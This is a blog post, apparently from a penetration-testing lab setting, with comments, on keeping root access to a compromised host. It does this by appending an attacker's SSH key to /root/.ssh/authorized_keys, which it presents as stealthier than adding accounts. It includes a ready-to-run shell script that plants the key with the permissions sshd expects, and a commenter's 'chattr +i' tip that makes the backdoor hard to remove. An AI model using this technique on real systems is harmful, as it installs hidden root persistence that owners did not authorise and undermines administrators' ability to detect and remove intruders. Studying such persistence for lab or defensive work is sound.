In the BackTrack penetration-testing labs, looking at /etc/passwd on a compromised box often shows it full of other students' usernames. That is not very stealthy and is very noticeable, and on a real pentest every extra account also opens up additional vulnerabilities.
It is far easier to add your own SSH key to /root/.ssh/authorized_keys.
First create your SSH key pair on your own machine with the command below and hit Enter a few times to accept the defaults:
$ ssh-keygen
This creates a few files in /root/.ssh/ (the private key and its public half), including id_rsa.pub. The public key is the only part that goes to the target.
Once created, copy the contents of your id_rsa.pub to the end of the authorized_keys file on the compromised host, one key per line.
This is usually /root/.ssh/authorized_keys.
Then you can just ssh -p 22 root@IP and you will be logged in as root. Two things to check if it does not work: sshd must allow root logins (PermitRootLogin must not be set to "no"; "prohibit-password" still permits key logins), and with StrictModes on, sshd silently ignores the file if /root/.ssh is not mode 700 or authorized_keys is not mode 600.
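The steps above, as an added example that is not part of the original post: a small POSIX sh helper that appends a public key to a target's authorized_keys without creating duplicates and with the permissions sshd expects. The target directory is a throwaway temp directory standing in for /root/.ssh, and the key line is a constructed placeholder, not a real key; both are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not the post's own code. Appends a public key to an
# authorized_keys file idempotently and fixes the permissions that sshd
# checks under StrictModes (700 on the directory, 600 on the file).

add_authorized_key() {
    # $1 = path of the target's .ssh directory, $2 = one public key line
    sshdir="$1"
    pubkey="$2"
    keyfile="$sshdir/authorized_keys"

    mkdir -p "$sshdir"
    chmod 700 "$sshdir"
    touch "$keyfile"
    chmod 600 "$keyfile"

    # Compare only the key material (field 2) so that re-running with a
    # different comment does not add a second, noisier entry.
    keymat=$(printf '%s\n' "$pubkey" | awk '{print $2}')
    if awk -v k="$keymat" '$2 == k {found=1} END {exit !found}' "$keyfile"; then
        return 0
    fi
    printf '%s\n' "$pubkey" >> "$keyfile"
}

# Number of non-empty lines (keys) in a target's authorized_keys.
count_keys() {
    grep -c . "$1/authorized_keys"
}

# Demo target: a temp directory stands in for /root/.ssh on the box.
DEMO_SSH=$(mktemp -d)
# Constructed placeholder shaped like an OpenSSH public key line; not a real key.
DEMO_PUBKEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDEMOKEYMATERIALdemo user@attacker"

add_authorized_key "$DEMO_SSH" "$DEMO_PUBKEY"
add_authorized_key "$DEMO_SSH" "$DEMO_PUBKEY"   # second call is a no-op
echo "keys on target: $(count_keys "$DEMO_SSH")"
```

On a real target, run the function with /root/.ssh as the first argument and the contents of your id_rsa.pub as the second, then connect with ssh -p 22 root@IP as described above.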
Anonymous says:
Dude, a little explanation please…
RE: added a picture and a little more detail.
HildeGard says:
If you put the key inside, do this:
chattr +i /root/.ssh/authorized_keys
😉